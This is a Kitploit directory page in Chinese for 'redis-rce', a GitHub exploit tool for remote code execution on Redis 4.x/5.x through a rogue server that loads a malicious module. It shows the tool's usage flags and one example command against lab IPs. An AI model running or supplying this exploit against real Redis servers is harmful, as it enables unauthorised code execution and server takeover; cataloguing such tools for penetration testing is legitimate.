Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Redis-RCE — Redis 4.x/5.x RCE | Kitploit
工具/GitHubGitHub/al1ex/redis-rce
漏洞分析漏洞利用后渗透利用渗透测试远程访问工具数据库安全
GitHubal1ex/redis-rce

Redis-RCE

Redis 4.x/5.x RCE

查看仓库
4236年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

redis-rce

Redis 4.x/5.x 远程代码执行(RCE)

#用法

root@kitploit:~
usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                    [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default exp.so
  -a AUTH, --auth AUTH  redis password
  -v, --verbose         show more info

示例:

root@kitploit:~
python3 redis-rce.py -r 192.168.174.139  -L 192.168.174.131 -f exp.so
下载工具